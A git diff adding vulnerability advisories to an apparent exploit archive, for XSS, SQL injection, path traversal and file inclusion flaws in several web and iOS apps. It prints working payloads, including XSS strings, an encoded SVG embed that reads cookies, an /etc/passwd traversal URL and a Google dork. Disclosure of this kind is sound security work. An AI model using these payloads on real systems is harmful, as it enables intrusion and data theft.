diff --git a/files.csv b/files.csv
index bd5f0ad0d..3f1609dd0 100755
--- a/files.csv
+++ b/files.csv
@@ -31167,3 +31167,15 @@ id,file,description,date,author,platform,type,port
 34609,platforms/php/webapps/34609.txt,"MySource Matrix 'char_map.php' Multiple Cross Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
+34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 'frmHelp.aspx' Cross Site Scripting Vulnerability",2010-09-09,"David Hoyt",asp,webapps,0
+34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax 'q' Parameter Cross Site Scripting Vulnerability",2009-08-13,Isfahan,php,webapps,0
+34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0
+34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting 'resume_register.php' Cross Site Scripting Vulnerability",2009-09-06,MizoZ,php,webapps,0
+34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 search.php q Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
+34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
+34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
+34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
+34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80
+34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
+34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
+34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
diff --git a/platforms/asp/webapps/34614.txt b/platforms/asp/webapps/34614.txt
new file mode 100755
index 000000000..ccf6f9a27
--- /dev/null
+++ b/platforms/asp/webapps/34614.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43110/info
+
+SmarterTools SmarterStats is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SmarterTools SmarterStats 5.3.3819 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/ios/webapps/34626.txt b/platforms/ios/webapps/34626.txt
new file mode 100755
index 000000000..0277f8e3c
--- /dev/null
+++ b/platforms/ios/webapps/34626.txt
@@ -0,0 +1,462 @@
+Document Title:
+===============
+Photorange v1.0 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1318
+
+
+Release Date:
+=============
+2014-09-07
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1318
+
+
+Common Vulnerability Scoring System:
+====================================
+6.3
+
+
+Product & Service Introduction:
+===============================
+The BEST and MOST Convenient Private Photo & Video & Docs App! Photorange provides a secure Password System to keep your 
+secret files 100% private. Your files are ONLY stored on your device and we can never touch them. 
+
+( Copy of the Vendor Homepage: https://itunes.apple.com/en/app/photorange-schutz-privat-foto/id896041290 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory discovered a local file include web vulnerability in the official Photorange v1.0 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-09-08: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Jiajun Kuang
+Product: Photorange - iOS Mobile Web Application 1.0
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Photorange v1.0 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or 
+system specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `add file` module. Remote attackers are able to inject own files with 
+malicious `filename` values in the `sync` device POST method request to compromise the mobile web-application. The local file/path include 
+execution occcurs in the file dir index web interface through the download path next to the vulnerable name/path value. The attacker is able 
+to inject the local file request by usage of the available `wifi interface` for file exchange via sync.
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute 
+different local malicious attack requests. The attack vector is on the application-side of the wifi service and the request method to 
+inject is POST via Sync. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) 
+count of 6.3. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low 
+user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected 
+device component compromise.
+
+
+Request Method(s):
+				[+] [Sync] [POST]
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Listing (Web Interface - http://localhost:9900/ )
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC: Exploit
+http://localhost:9900/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT
+http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT
+
+
+
+PoC: Web Interface - Index Dir Listing
+
+<html><head>
+        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+        <title>WiFi web access</title>
+        </head>?????<body><fontbase family="Arial,Verdana">
+        <style type="text/css">
+            a, div{
+                font-family: Arial,Verdana;
+            }
+            body {
+                background-color: silver;
+                position: relative;
+                height: 100%;
+            }
+            hr {
+                height: 1px;
+                border: none;
+                border-top: 1px solid #DDDDDD;
+            }
+            #content {
+                background-color: white;
+                border-style: dashed;
+                border-color: silver;
+                border-width: 1px;
+                position: absolute;
+                width: 98%;
+                left: 10px;
+                top: 10px;
+                z-index: 333;
+            }
+            .aImg {
+                margin-left: 10px;
+                margin-right: 10px;
+                margin-top: 20px;
+                border:none;
+            }
+            /*.aFod {
+                color: GrayText;
+                text-decoration: none;
+                width: 50px;
+                height: 50px;
+            }*/
+            #progress-bar-background {
+                width: 100%;
+                height: 100%;
+                /*background:silver url('/Web/left.ico') no-repeat;*/
+                background: silver;
+                position: absolute; 
+                top:0; 
+                pointer-events:none;
+                cursor: pointer;
+            }
+            #file-uploader-text {
+                width: 155px; 
+                height: 30px; 
+                text-align: center; 
+                line-height: 30px; 
+                cursor: pointer;
+            }
+            #file-uploader {
+                width: 155px; 
+                height: 30px;
+                left: 18px;
+                position: absolute; 
+                top: 0; 
+                opacity: 0;
+                filter: alpha(opacity=0);
+                cursor: pointer;
+            }
+            #progress-bar-value {
+                width: 0%;
+                height: 100%;
+                background: #2B90D3;
+            }
+            .btnText {
+                width: 155px; 
+                height: 30px; 
+                text-align: center; 
+                line-height: 30px; 
+                cursor: pointer;
+                font-size: 13px;
+                text-align: center;
+                color: white;
+            }
+            #submit-link {
+                display: none;
+                position: absolute;
+                top: 7px;
+                left: 200px;
+            }
+            #stop-uploading-link {
+                display: none;
+                position: absolute;
+                top: 7px;
+                left: 200px;
+            }
+        </style>
+        
+        <link href="/Web/uploadify/uploadify.css" rel="stylesheet" type="text/css" media="screen">
+        <script type="text/javascript" src="/Web/uploadify/jquery.min.js"></script>
+        <script type="text/javascript" src="/Web/uploadify/jquery.uploadify.js"></script>
+        
+        <script language="javascript">
+            var currentFolderPath = '/';
+            var alertMessage = "null";
+            var actionType = "Show";
+            var submitting = false;
+            var tipHiddenTop = -200;
+            var tipShownTop = -80;
+            var lastShownTipDate;
+            
+            if (alertMessage != "null") {
+                alert(alertMessage);
+            }
+            
+            function tippable() {
+                var currentTop = document.getElementById("tip").style.top;
+                currentTop = currentTop.substring(0, currentTop.length-2);
+                currentTop = Number(currentTop);
+                
+                var not = ((currentTop > tipHiddenTop) && (currentTop < tipShownTop))
+                return !not;
+            }
+            
+            function hideTip() {
+                var tip = document.getElementById("tip");
+                tip.style.top = tipHiddenTop;
+            }
+            
+            function showTip() {
+
+                var tip = document.getElementById("tip");
+                tip.style.top = tipShownTop;
+                lastShownTipDate = new Date();
+                setTimeout("if((new Date()).getTime()-lastShownTipDate.getTime()>=4900){hideTip();}", 5000);
+            }
+            
+            function aClickHandler(tag) {
+                if (submitting) {
+                    return;
+                }
+                
+                if (actionType == "Show")
+                {
+                    if (tag.className == "image") {
+                        document.body.style.overflow = "hidden"; //??body??
+                        var wrap = document.getElementById("wrap");
+                        wrap.style.display = "block";
+                        var src = "/" + actionType + tag.name;
+                        wrap.innerHTML = "<iframe id='photo-viewer' src='" + src + "' style='position:absolute;width:100%;height:100%' frameborder='no' scrolling='no' allowtransparency='yes' />";
+                    }                 
+                    else {
+                        if (!tippable()) {
+                            return;
+                        }
+                        
+                        document.getElementById("tip").style.top = tipHiddenTop;
+                        document.getElementById("tip-content").innerHTML = "Jetzt kann nur Bild im Browser gesehen werden.";
+                        showTip();
+                    }
+                }
+                else {
+                    var download = "/" + actionType + tag.name;
+                    location.href = download;
+                }
+            }
+            function dClickHandler(tag) {
+                if (submitting) {
+                    return;
+                }
+                
+                location.href = tag.name;
+            }
+            
+            function removePhotoViewer()
+            {
+                var wrap = document.getElementById("wrap");
+                wrap.innerHTML = "";
+                wrap.style.display = "none";
+                
+                document.body.style.overflow = "auto";
+            }
+            
+            function setViewMode()
+            {
+                var switchBg = document.getElementById("switch-bg");
+                var __switch = document.getElementById("switch");
+                
+                switchBg.style.backgroundColor = "silver";
+                __switch.style.backgroundColor = "#2B90D3";
+            }
+            function setDownloadMode()
+            {
+                var switchBg = document.getElementById("switch-bg");
+                var __switch = document.getElementById("switch");
+                
+                switchBg.style.backgroundColor = "#2B90D3";
+                __switch.style.backgroundColor = "silver";
+            }
+            function switchMode() {
+                if (!tippable()) {
+                    return;
+                }
+                
+                var ifInDownloadMode = (actionType == "Download");
+                actionType = ifInDownloadMode ? "Show" : "Download";
+                var ifInDownloadModeNow = !ifInDownloadMode;
+                if (ifInDownloadModeNow)
+                {
+                    setDownloadMode();
+                    document.getElementById("tip").style.top = tipHiddenTop;
+                    document.getElementById("tip-content").innerHTML = "Tipp: anklicken  irgend ein Daumennagel zum Herunterladen";
+                    showTip();
+                }
+                else {
+                    setViewMode();
+                    hideTip();
+                }
+            }
+            
+            $(document).ready(function () { 
+                $("#file-upload").uploadify({
+                  height        : 30,
+                  swf           : '/Web/uploadify/uploadify.swf',
+                  uploader      : 'upload.html',
+                  width         : 120,
+                  onQueueComplete : function(queueData) {
+                    location.reload();
+                  },
+                  buttonText    : "?berliefern",
+                  onUploadStart : function(file) {
+                    $.post("/setCurrent"+currentFolderPath, {}, function(data){}, "json");
+                    $.post("/ifReachTheLimit/"+file.name, {}, function(data){ $("#file-upload").uploadify('stop'); }, "json");
+                  }
+                });
+                document.getElementById("file-upload").style.left = "15px";
+            });
+        
+        </script>
+    
+    
+        <div id="tip" style="position:absolute; top:-200px; left:40%; z-index:2000">
+            <img style="" src="/Web/tip.png">
+            <div id="tip-content" style="position:absolute; left:0px; top:120px; z-index:2001; text-align:center; color:white; width:300px;">
+                Tip: how to do
+            </div>
+        </div>
+        
+        <div id="content" onselectstart="return false;">
+            <a href="/logout.html" style="float:right; margin:10px;">outloggen</a>
+            
+            <h1 style="margin-left:10px; font-weight:lighter;">WiFi web access</h1>
+            
+            <div id="buttons" style="position:relative; left:10px; height:60px;">
+                
+                <a href="/back.html" style="text-decoration:none; position:absolute; top:0; left:0;"><img src="/Web/back3.png" style="width:25px; height:25px; border:none; vertical-align:middle"> Oberverzeichnis [aktuell:/]</a>
+                
+                <!--mode-->
+                <div id="switch-bg" style="width:250px; height:30px; background:silver no-repeat; position:absolute; right:20px; text-align:right; line-height:30px; color:#E9E3E3; cursor:hand; bottom:-30; right:30px; padding-right:5px;" onclick="switchMode();">
+                    herunterladen
+                    <div id="switch" style="position:absolute; top:0; left:0; width:50%; height:100%; background:#2B90D3 no-repeat; text-align:left; padding-left:5px">
+                        durchlesen
+                    </div>
+                </div>
+                <!--mode end-->
+            </div>
+            <!--buttons end-->
+            
+            <div style="height: 30px; width: 120px; left: 15px;" class="uploadify" id="file-upload"><object style="position: absolute; z-index: 1;" id="SWFUpload_0" type="application/x-shockwave-flash" data="/Web/uploadify/uploadify.swf" class="swfupload" height="30" width="120"><param name="wmode" value="transparent"><param name="movie" value="/Web/uploadify/uploadify.swf"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><param name="flashvars" value="movieName=SWFUpload_0&uploadURL=%2Fupload.html&useQueryString=false&requeueOnError=false&httpSuccess=&assumeSuccessTimeout=30?ms=&filePostName=Filedata&fileTypes=*.*&fileTypesDescription=All%20Files&fileSizeLimit=0&fileUploadLimit=0&fileQueueLimit=999&debugEnabled=false&buttonImageURL=%2F&buttonWidth=120&buttonHeight=30&buttonText=&buttonTextTopPadding=0&buttonTextLeftPadding=0&buttonTextStyle=color%3A%20%23000000%3B%20font-size%3A%2016pt%3B&buttonAction=-110&buttonDisabled=false&buttonCursor=-2"></object><div style="height: 30px; line-height: 30px; width: 120px;" class="uploadify-button " id="file-upload-button"><span class="uploadify-button-text">?berliefern</span></div></div><div class="uploadify-queue" id="file-upload-queue"></div>
+            <hr>
+            
+            <a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px">?????<div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
+        </div>
+        
+        <div id="wrap" style="background-color:black; top:0; left:0; width:100%; height:100%; position:absolute; z-index:1000; display:none;">
+        </div>
+        <!--wrap end-->
+    </body>
+</html></iframe></div></a></div></fontbase></body></html>
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[17] Mime Type[application/download]
+   Request Header:
+      Host[localhost:9900]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:9900/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[17]
+      Content-Disposition[attachment; filename=%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT]
+      Content-Type[application/download]
+      Date[Sat, 06 Sep 2014 00:13:00 GMT]
+
+
+
+
+Reference(s): Links
+http://localhost:9900/
+http://localhost:9900/Download/
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be pactehd by a secure parse and encode of the vulnerable filename value on sync or upload.
+Filter and restrict the input to prevent further executions. Encode also the output name value listing in the index file dir module.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the filename value of the mobile application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
+
diff --git a/platforms/ios/webapps/34627.txt b/platforms/ios/webapps/34627.txt
new file mode 100755
index 000000000..151f9ee0c
--- /dev/null
+++ b/platforms/ios/webapps/34627.txt
@@ -0,0 +1,155 @@
+Document Title:
+===============
+ChatSecure IM v2.2.4 iOS - Persistent Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1317
+
+
+Release Date:
+=============
+2014-09-10
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1317
+
+
+Common Vulnerability Scoring System:
+====================================
+5.9
+
+
+Product & Service Introduction:
+===============================
+Free unlimited messaging with your friends over Facebook Chat, GChat & more! Works with iPhone, Mac, Linux or PC and 
+mobile devices. Secure Chat is an open source, encryption-capable chat program that Cypher Punks Off-the-Record protocol 
+used to protect a conversation about XMPP (Google Talk, Jabber, etc) or Oscar (AIM). Forking on Github!
+
+( Copy of the Homepage: https://itunes.apple.com/de/app/chatsecure-verschlusselter/id464200063 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the ChatSecure IM v2.2.4 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-09-10: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Chris Ballinger
+Product: ChatSecure IM - iOS Mobile Web Application 2.2.4
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the ChatSecure IM v2.2.4 iOS mobile web-application.
+The vulnerability allows an attacker to inject own malicious script codes to the application-side of the chat im ios app.
+
+The issue is located in the main message body context. During the tests we discovered that the chat message validation 
+impact a misconfiguration. In the message body context it is possible to inject persistent script code in splitted combination.
+The attacker activates the chat interact with a victim and can send malicious messages that compromise the other device on 
+interaction. The validation parses script code tags but does not secure validate embed script codes with onload in object tags.
+
+The security risk of the local persistent vulnerability in the chat message body is estimated as high with a cvss (common vulnerability 
+scoring system) count of 6.0. Exploitation of the application-side vulnerability requires no privileged app user account or user interaction. 
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious 
+source and persistent manipulation of affected or connected module context.
+
+Request Method(s):
+				[+] [Bluetooth - Nearby Sync]
+
+Vulnerable Module(s):
+				[+] Message Board Index
+
+Vulnerable Parameter(s):
+				[+] message body context
+
+Affected Module(s):
+				[+] Message Board Index - Chat Index
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction.
+For security demonstration or to reproduce the web vulnerability follow the provided steps and information below to continue.
+
+1. Install the mobile application chat iOS app (https://itunes.apple.com/de/app/chatsecure-verschlusselter/id464200063)
+2. Interact with an user account and inject the payload to the message body
+3. The code executes at both sites of the user clients on the application-side of the service
+4. Successful reproduce of the vulnerability!
+
+PoC: Payload #1
+<EMBED SRC="data:image/svg+xml;base64,JTIwPiI8PGlmcmFtZSBzcmM9aHR0cDovL3Z1bG4tbGFiLmNvbSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSA8" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of embed script codes in connection object tags.
+Filter the message body and restrict the input to disallow special char injection with application-side attack vector.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the secure chat im is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/34616.txt b/platforms/php/webapps/34616.txt
new file mode 100755
index 000000000..9d635e8b3
--- /dev/null
+++ b/platforms/php/webapps/34616.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43131/info
+
+Elkagroup Elkapax is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/?q=<script>alert(123)</script>&mode=2
\ No newline at end of file
diff --git a/platforms/php/webapps/34617.txt b/platforms/php/webapps/34617.txt
new file mode 100755
index 000000000..a0d5ce9f6
--- /dev/null
+++ b/platforms/php/webapps/34617.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43158/info
+
+Perlshop is prone to multiple input-validation vulnerabilities including a nondescript input-validation vulnerability, multiple cross-site scripting vulnerabilities, and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, input arbitrary data to restricted parameters, and view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks. 
+
+http://www.example.cgi/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar 
\ No newline at end of file
diff --git a/platforms/php/webapps/34618.txt b/platforms/php/webapps/34618.txt
new file mode 100755
index 000000000..49af52b17
--- /dev/null
+++ b/platforms/php/webapps/34618.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43163/info
+
+Omnistar Recruiting is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/34619.txt b/platforms/php/webapps/34619.txt
new file mode 100755
index 000000000..b149a88e6
--- /dev/null
+++ b/platforms/php/webapps/34619.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43213/info
+
+Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search.php?q=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/34620.txt b/platforms/php/webapps/34620.txt
new file mode 100755
index 000000000..1d705669e
--- /dev/null
+++ b/platforms/php/webapps/34620.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43213/info
+ 
+Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/image.php?image=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34624.txt b/platforms/php/webapps/34624.txt
new file mode 100755
index 000000000..179d5254a
--- /dev/null
+++ b/platforms/php/webapps/34624.txt
@@ -0,0 +1,15 @@
+# Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing!
+# Discovered by: Provensec
+# Website: http://www.provensec.com
+# Author: Provensec Labs
+# Type of vulnerability: XSS Stored
+# Description:
+
+1 Goto http://server add a new lead fill all the fields properly but Fill the email filed with xss payload  as given in the screenshot
+http://prntscr.com/4lf043 
+
+payload used "><img src=d onerror=confirm(/provensec/);>
+
+2 click save and close button
+
+http://prntscr.com/4lf0ej
diff --git a/platforms/php/webapps/34625.py b/platforms/php/webapps/34625.py
new file mode 100755
index 000000000..f8684daf9
--- /dev/null
+++ b/platforms/php/webapps/34625.py
@@ -0,0 +1,382 @@
+#!/usr/bin/env python
+#
+#
+# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
+#
+# Exploit Author : Claudio Viviani
+#
+# Vendor Homepage : http://web-dorado.com/
+#
+# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60 (fixed)
+#   Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE (no fixed)
+#
+# Dork Google: inurl:option=com_spidercontacts
+#
+# Date : 2014-09-07
+#
+# Tested on : Windows 7 / Mozilla Firefox
+#             Linux / Mozilla Firefox
+#
+#
+#
+######################
+#
+# PoC Exploit:
+#
+# http://localhost/joomla/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
+#
+#
+# "contacts_id" variables is not sanitized.
+# 
+#
+# Vulnerability Disclosure Timeline:
+#
+# 2014-09-07:  Discovered vulnerability
+# 2014-09-09:  Vendor Notification
